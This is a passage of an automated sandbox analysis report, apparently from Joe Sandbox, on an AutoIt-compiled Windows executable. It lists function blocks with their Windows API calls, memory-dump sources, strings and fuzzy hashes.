• InterlockedDecrement.KERNEL32(?), ref: 003D74AC
• _free.LIBCMT ref: 003D74BF
• InterlockedIncrement.KERNEL32(00F564A0), ref: 003D74D7
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
• String ID:
• API String ID: 2704283638-0
• Opcode ID: 4c17999c63e9b4953814a1fa9350ccaa633096616d38e2b2515d7b809a87ad46
• Instruction ID: 10f6300d0be9e53c5107c092a66ea3b430609b0529dca8dbcadeb4675cf13b27
• Opcode Fuzzy Hash: 4c17999c63e9b4953814a1fa9350ccaa633096616d38e2b2515d7b809a87ad46
• Instruction Fuzzy Hash: 4E01AD3390AA21ABC713AF26B40675DBB70BB04710F16401BF8147B780FB246951CFCA
APIs
  • Part of subcall function 003CAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 003CAFE3
  • Part of subcall function 003CAF83: SelectObject.GDI32(?,00000000), ref: 003CAFF2
  • Part of subcall function 003CAF83: BeginPath.GDI32(?), ref: 003CB009
  • Part of subcall function 003CAF83: SelectObject.GDI32(?,00000000), ref: 003CB033
• MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0041EA8E
• LineTo.GDI32(00000000,?,?), ref: 0041EA9B
• EndPath.GDI32(00000000), ref: 0041EAAB
• StrokePath.GDI32(00000000), ref: 0041EAB9
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
• String ID:
• API String ID: 1539411459-0
• Opcode ID: 2f1e8fff8dc2306fe8f28832a48125dcda54aa32890655c21d1c7754c1f0cd6c
• Instruction ID: c8994a9c2b410d8bbca4876638e6ee75c0ebb6ff5b1aac5bd83914c552aace53
• Opcode Fuzzy Hash: 2f1e8fff8dc2306fe8f28832a48125dcda54aa32890655c21d1c7754c1f0cd6c
• Instruction Fuzzy Hash: 02F0BE32405258BBDB129FA4AC09FCE3F29AF06714F044112FE01610F183B855A1CB9D
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 003EC84A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 003EC85D
• GetCurrentThreadId.KERNEL32 ref: 003EC864
• AttachThreadInput.USER32(00000000), ref: 003EC86B
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: 0f4c01b8d192416a2a56649eaf5632aabbff866244665dff8fb5f5bbc5447ac0
• Instruction ID: b5752b4b2ec9e887f17afc5723bad9738ca92520103bb87696afb8df6f990c03
• Opcode Fuzzy Hash: 0f4c01b8d192416a2a56649eaf5632aabbff866244665dff8fb5f5bbc5447ac0
• Instruction Fuzzy Hash: 44E06D71941278BBDF211BA2EC0EEDB7F2CEF167A1F00A121B60D844A1C6B1C581DBE0
APIs
• GetCurrentThread.KERNEL32 ref: 003EB0D6
• OpenThreadToken.ADVAPI32(00000000,?,?,?,003EAC9D), ref: 003EB0DD
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003EAC9D), ref: 003EB0EA
• OpenProcessToken.ADVAPI32(00000000,?,?,?,003EAC9D), ref: 003EB0F1
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
• Opcode ID: 43fecf1500f651515f474761171d037bc02e4346009bf236b2330021d286ccb5
• Instruction ID: 90824749d10fef7b751e4d2a2e8f0e9b954c883b2b390d4f4a246df6b5d7dd43
• Opcode Fuzzy Hash: 43fecf1500f651515f474761171d037bc02e4346009bf236b2330021d286ccb5
• Instruction Fuzzy Hash: 73E08632F012219BD7211FB26D0CB4B7BBCEF55B95F128938F641E6080DB349801CB64
APIs
• GetSysColor.USER32(00000008), ref: 003CB496
• SetTextColor.GDI32(?,000000FF), ref: 003CB4A0
• SetBkMode.GDI32(?,00000001), ref: 003CB4B5
• GetStockObject.GDI32(00000005), ref: 003CB4BD
• GetWindowDC.USER32(?,00000000), ref: 0042DE2B
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0042DE38
• GetPixel.GDI32(00000000,?,00000000), ref: 0042DE51
• GetPixel.GDI32(00000000,00000000,?), ref: 0042DE6A
• GetPixel.GDI32(00000000,?,?), ref: 0042DE8A
• ReleaseDC.USER32(?,00000000), ref: 0042DE95
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
• String ID:
• API String ID: 1946975507-0
• Opcode ID: c2de6114020213faa751fa01985f926ca36388b3f05e2ed62aacaf6e11618766
• Instruction ID: a8d460fbe55c17b6fcdf65d4adc614964db61abe1227f7ec9bc1e1f4b2a6c775
• Opcode Fuzzy Hash: c2de6114020213faa751fa01985f926ca36388b3f05e2ed62aacaf6e11618766
• Instruction Fuzzy Hash: DEE06D31A00240ABDF211F64BC09BD97B21AB11335F10C226F679980E2C7714980CB15
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: 8532686f169117a1ec01c987de1356f4d86684e04ca53c432dbac52e94f05eb3
                                                                                • Instruction ID: f65fc19cfc5032d22554f55574638120cd2604f20a2d91381646cb1e2fbfb1d0
                                                                                • Opcode Fuzzy Hash: 8532686f169117a1ec01c987de1356f4d86684e04ca53c432dbac52e94f05eb3
                                                                                • Instruction Fuzzy Hash: 1DE04FB5900204EFDB015F70E84DA2E7BA8EF4C350F11D82AFC6ACB250CB7598418B58
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003EB2DF
                                                                                • UnloadUserProfile.USERENV(?,?), ref: 003EB2EB
                                                                                • CloseHandle.KERNEL32(?), ref: 003EB2F4
                                                                                • CloseHandle.KERNEL32(?), ref: 003EB2FC
                                                                                  • Part of subcall function 003EAB24: GetProcessHeap.KERNEL32(00000000,?,003EA848), ref: 003EAB2B
                                                                                  • Part of subcall function 003EAB24: HeapFree.KERNEL32(00000000), ref: 003EAB32
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                • String ID:
                                                                                • API String ID: 146765662-0
                                                                                • Opcode ID: 481ec3ae22d95ca6196370e999ffc6c0cb202ab2c411829dfcb078e0c965b59d
                                                                                • Instruction ID: 6fd9c3c7828cef7d53d991a36c23843046c73aadc4066fdb93b7eb3a69155854
                                                                                • Opcode Fuzzy Hash: 481ec3ae22d95ca6196370e999ffc6c0cb202ab2c411829dfcb078e0c965b59d
                                                                                • Instruction Fuzzy Hash: 05E0BF36504405BBCB012B95EC08859FB76FF883213109231F61581571CB32A871EB95
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: c65c509e8534c394d66b50944d17e616c18969eb5558d96d58cf21132fa832d2
                                                                                • Instruction ID: 7b7a9e548890d6edfac58ee0a6e63bba88960086aa5926d649a06ab416cb4184
                                                                                • Opcode Fuzzy Hash: c65c509e8534c394d66b50944d17e616c18969eb5558d96d58cf21132fa832d2
                                                                                • Instruction Fuzzy Hash: E2E046B1900200EFDB015F70E849A2D7BA8EB4C350F11D829F96ECB260CB79A8008B08
                                                                                APIs
                                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 003EDEAA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ContainedObject
                                                                                • String ID: AutoIt3GUI$Container
                                                                                • API String ID: 3565006973-3941886329
                                                                                • Opcode ID: 87075b3f44855aa511f3d9d299c598436438ef952a91d8e3ab8202a975b94a2d
                                                                                • Instruction ID: 8be7e5ae938e02ce17ee400ce1a54a79993204e40d212233fc72f4bf293d2174
                                                                                • Opcode Fuzzy Hash: 87075b3f44855aa511f3d9d299c598436438ef952a91d8e3ab8202a975b94a2d
                                                                                • Instruction Fuzzy Hash: 2A913870600611AFDB15DF65C884F6AB7B9BF49710F20866EF94ACF691DB70E841CB50
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscpy
                                                                                • String ID: I/B$I/B
                                                                                • API String ID: 3048848545-1122223593
                                                                                • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                                • Instruction ID: 534f4319a50545cb41868b683962f79a32bd119dc631dc1e6977d1e9e76916a1
                                                                                • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                                • Instruction Fuzzy Hash: B741D63190021EEACF27EF98D441AFFB7B4EF48714F51505AEA81AB191DB705E92C760
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000), ref: 003CBCDA
                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 003CBCF3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemorySleepStatus
                                                                                • String ID: @
                                                                                • API String ID: 2783356886-2766056989
                                                                                • Opcode ID: d2bcb7dd5f91910b00ba9bff32202bbefdc78c014709878a3ceb7ac509e10c9e
                                                                                • Instruction ID: 9a973d572b7b7ebe4b69595f598200f8cc0b25f635af471b6ae1ca52ca5afbaa
                                                                                • Opcode Fuzzy Hash: d2bcb7dd5f91910b00ba9bff32202bbefdc78c014709878a3ceb7ac509e10c9e
                                                                                • Instruction Fuzzy Hash: 8B513571408744ABE321AF14D886FAFBBE8FB94354F41485EF1C8850A2EF7099A88756
                                                                                APIs
                                                                                  • Part of subcall function 003B44ED: __fread_nolock.LIBCMT ref: 003B450B
                                                                                • _wcscmp.LIBCMT ref: 003FC65D
                                                                                • _wcscmp.LIBCMT ref: 003FC670
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscmp$__fread_nolock
                                                                                • String ID: FILE
                                                                                • API String ID: 4029003684-3121273764
                                                                                • Opcode ID: 108a7a1a0c43df2849250f1cbb64f3bc27f4da90f8b71f6093d3cc8b96bead91
                                                                                • Instruction ID: e811273b30229e0074c59c91d1ac448e6a8752f13bbd1145d29407fb326f5185
                                                                                • Opcode Fuzzy Hash: 108a7a1a0c43df2849250f1cbb64f3bc27f4da90f8b71f6093d3cc8b96bead91
                                                                                • Instruction Fuzzy Hash: 5841D272A4420EBBDF229AA4DC42FEF77B9AF49714F00006AF705EB181D6749A04CB65
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 0041A85A
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0041A86F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: '
                                                                                • API String ID: 3850602802-1997036262
                                                                                • Opcode ID: 390db08f6b300ad102b0f9580dca13044ebd5d4a7e6a33e52d53daf9f2b8ec7b
                                                                                • Instruction ID: 2a12458c02ac084b6d3cff56500fcdc5356b3e1b8e466b9dd17387d1a7e23324
                                                                                • Opcode Fuzzy Hash: 390db08f6b300ad102b0f9580dca13044ebd5d4a7e6a33e52d53daf9f2b8ec7b
                                                                                • Instruction Fuzzy Hash: 95410A74E013099FDB14DF68C981BDA7BB5FB08304F10006AE919EB391D774A992CFA5
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 0041980E
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0041984A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$DestroyMove
                                                                                • String ID: static
                                                                                • API String ID: 2139405536-2160076837
                                                                                • Opcode ID: f94d3fad8e9a21d96bafe4859bb14c836b59fa8fc9d4ea9fd88669ef04fea1da
                                                                                • Instruction ID: 04c6a206a7942d214e2942a9d2be794cca72143debf597a9ade3e77b7f4e5310
                                                                                • Opcode Fuzzy Hash: f94d3fad8e9a21d96bafe4859bb14c836b59fa8fc9d4ea9fd88669ef04fea1da
                                                                                • Instruction Fuzzy Hash: 44318F71110204AEEB109F38CC91BFB73A9FF59764F00862AF8A9C7190CB34AC81D764
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 003F51C6
                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003F5201
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: InfoItemMenu_memset
                                                                                • String ID: 0
                                                                                • API String ID: 2223754486-4108050209
                                                                                • Opcode ID: bac25d60cc27dd0efb0c631fbe7afd1defdc81405031902e89ea0dc1ef6afbd4
                                                                                • Instruction ID: fbb79472d8a46810d5930de5f56896cfa6b6e5f9b560be9d35d6be6931ff51b0
                                                                                • Opcode Fuzzy Hash: bac25d60cc27dd0efb0c631fbe7afd1defdc81405031902e89ea0dc1ef6afbd4
                                                                                • Instruction Fuzzy Hash: 6931D53160070CBBEB26CF99D845BBEBBF8EF46350F154929EB85A61A0D7709A44CB10
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: __snwprintf
• String ID: , $$AUTOITCALLVARIABLE%d
• API String ID: 2391506597-2584243854
• Opcode ID: 006448163e6c6f4bff2d95876d34e9c053389617e9aeff47d7e2d3b89b1ecea9
• Instruction ID: 9ae9d63e1d334ab87043af54bc8173f6f2430f47454ae59425c4a344d9cd95df
• Opcode Fuzzy Hash: 006448163e6c6f4bff2d95876d34e9c053389617e9aeff47d7e2d3b89b1ecea9
• Instruction Fuzzy Hash: 6521C131600118AFCF11EF64C882FEE73B4AF45304F1104AAF506AF181DB79EA15CBAA
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0041945C
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00419467
Strings
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: 40174ae870f00778641e2e28cd3040eefa515e06ed78534c05c302aaa697b9f1
• Instruction ID: 0d72a339671ec6f96f9897026764aa3a7ca9995fa2fe95199ff15f8b140044e0
• Opcode Fuzzy Hash: 40174ae870f00778641e2e28cd3040eefa515e06ed78534c05c302aaa697b9f1
• Instruction Fuzzy Hash: EF11B271300208BFEF15DE54DC90EFB376EEB883A4F10012AF919972A0D6399C928768
APIs
  • Part of subcall function 003CB34E: GetWindowLongW.USER32(?,000000EB), ref: 003CB35F
• GetActiveWindow.USER32 ref: 0041DA7B
• EnumChildWindows.USER32(?,0041D75F,00000000), ref: 0041DAF5
Strings
Similarity
• API ID: Window$ActiveChildEnumLongWindows
• String ID: T1@
• API String ID: 3814560230-611653980
• Opcode ID: 8ed043ac8b82488aabd6843ade94509215cd029e2e38369aaaece2df50a47933
• Instruction ID: 964ae18533100a9ecf5606c7913a1477e4a9c1bbed19a4a42cfcc31f52b14eef
• Opcode Fuzzy Hash: 8ed043ac8b82488aabd6843ade94509215cd029e2e38369aaaece2df50a47933
• Instruction Fuzzy Hash: 03212875604201DBC714DF28D851AA6B7E5EF59320F25462AE86A873E0D734B880CB68
APIs
  • Part of subcall function 003CD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003CD1BA
  • Part of subcall function 003CD17C: GetStockObject.GDI32(00000011), ref: 003CD1CE
  • Part of subcall function 003CD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 003CD1D8
• GetWindowRect.USER32(00000000,?), ref: 00419968
• GetSysColor.USER32(00000012), ref: 00419982
Strings
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: d4e75c036cca4202eb5fe0c8a3b7eb6ac1d628ce3acd0f6a6b6dd326610daf67
• Instruction ID: b332cf302c00981b2729abf442500272e7131c93261fea144359ff3e59a3b4e4
• Opcode Fuzzy Hash: d4e75c036cca4202eb5fe0c8a3b7eb6ac1d628ce3acd0f6a6b6dd326610daf67
• Instruction Fuzzy Hash: 95113AB2520209AFDB04DFB8CC45EEA7BA8FB08344F05562DF955D3250E738E851DB64
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 00419699
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004196A8
Strings
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: e5298bc559ef51b2eb288408e6de2796c2f0b03e3f2b23f6dcecd25f9881d7d0
• Instruction ID: a726c6fcf5115229e79f02a1ed018288463bfafd70fa286d5874dd15fffa874a
• Opcode Fuzzy Hash: e5298bc559ef51b2eb288408e6de2796c2f0b03e3f2b23f6dcecd25f9881d7d0
• Instruction Fuzzy Hash: 2C118C71500108ABEB115F64DC64EEB3B6AEB053B8F104326F965972E0C739DC919B68
APIs
• _memset.LIBCMT ref: 003F52D5
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003F52F4
Strings
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
